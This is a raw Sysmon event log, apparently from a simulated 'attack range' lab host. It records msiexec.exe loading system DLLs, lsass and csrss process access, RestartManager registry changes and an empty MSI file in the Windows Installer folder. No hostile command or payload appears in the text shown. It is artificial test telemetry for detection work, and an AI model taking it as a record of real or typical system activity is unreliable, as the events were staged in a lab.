LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696232Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696231Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696230Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696229Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696228Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696227Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696226Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696225Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.006{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696224Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696223Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696222Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696221Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696220Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696219Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696218Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696217Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696216Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696215Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696214Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696213Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002696212Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-EE97-62A8-7E00-000000006202}18083264C:\Windows\system32\csrss.exe{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696211Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696210Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696209Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002696208Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002696207Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-EE55-62A8-0500-000000006202}3961060C:\Windows\system32\csrss.exe{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002696206Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.991{7CF983DC-981D-62AC-1A6B-000000006202}48403496C:\Windows\system32\msiexec.exe{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6f523|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Windows\system32\Msi.dll+ba6c8|C:\Windows\system32\Msi.dll+16e294|C:\Windows\system32\Msi.dll+16e90c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 154100x80000000000000002696205Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.998{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\System32\MsiExec.exe -Embedding C2200B2A80695614509AECEE4CBDCC3CC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /VNT AUTHORITY\SYSTEM 13241300x80000000000000002696204Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:10.975{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceDWORD (0x00000001)NT AUTHORITY\SYSTEM 12241200x80000000000000002696203Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.975{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 13241300x80000000000000002696202Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:10.975{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashBinary DataNT AUTHORITY\SYSTEM 13241300x80000000000000002696201Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:10.975{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerBinary DataNT AUTHORITY\SYSTEM 12241200x80000000000000002696200Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.975{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002696199Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.975{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 10341000x80000000000000002696198Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.959{7CF983DC-981D-62AC-1A6B-000000006202}48403272C:\Windows\system32\msiexec.exe{7CF983DC-9826-62AC-3B6B-000000006202}4244C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+19fdbd|C:\Windows\system32\Msi.dll+2ea9e|C:\Windows\system32\Msi.dll+474f5|C:\Windows\system32\Msi.dll+10b3b5|C:\Windows\system32\Msi.dll+10a5d6|C:\Windows\system32\Msi.dll+f4b9f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 734700x80000000000000002696197Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.959{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll4.8.3761.0 built by: NET48REL1Assembly managerMicrosoft® .NET FrameworkMicrosoft Corporationfusion.dllMD5=2A73BA7551F7B631AA484CAABD372F06,SHA256=F876EEEC603221DCDD098D1E2A1118012254E9C67851E749DF61D573EA949F55trueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002696196Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.959{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002696195Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.959{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 254200x80000000000000002696194Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.959{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5147.msi2022-06-13 14:04:24.0002022-06-17 15:05:10.959NT AUTHORITY\SYSTEM 10341000x80000000000000002696193Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.959{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002696192Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.959{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 11241100x80000000000000002696191Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.959{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5147.msi2022-06-17 15:05:10.959NT AUTHORITY\SYSTEM 23542300x80000000000000002696190Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.959{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5147.msiMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855falsetrue 11241100x80000000000000002696189Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.959{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5147.msi2022-06-17 15:05:10.959NT AUTHORITY\SYSTEM 534500x80000000000000002695497Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.522{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002695496Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteKey2022-06-17 15:05:10.522{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002695495Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:10.522{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerNT AUTHORITY\SYSTEM 12241200x80000000000000002695494Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:10.522{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashNT AUTHORITY\SYSTEM 12241200x80000000000000002695493Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:10.522{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceNT AUTHORITY\SYSTEM 12241200x80000000000000002695492Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.522{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002695491Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.522{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002695490Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.522{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002695489Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 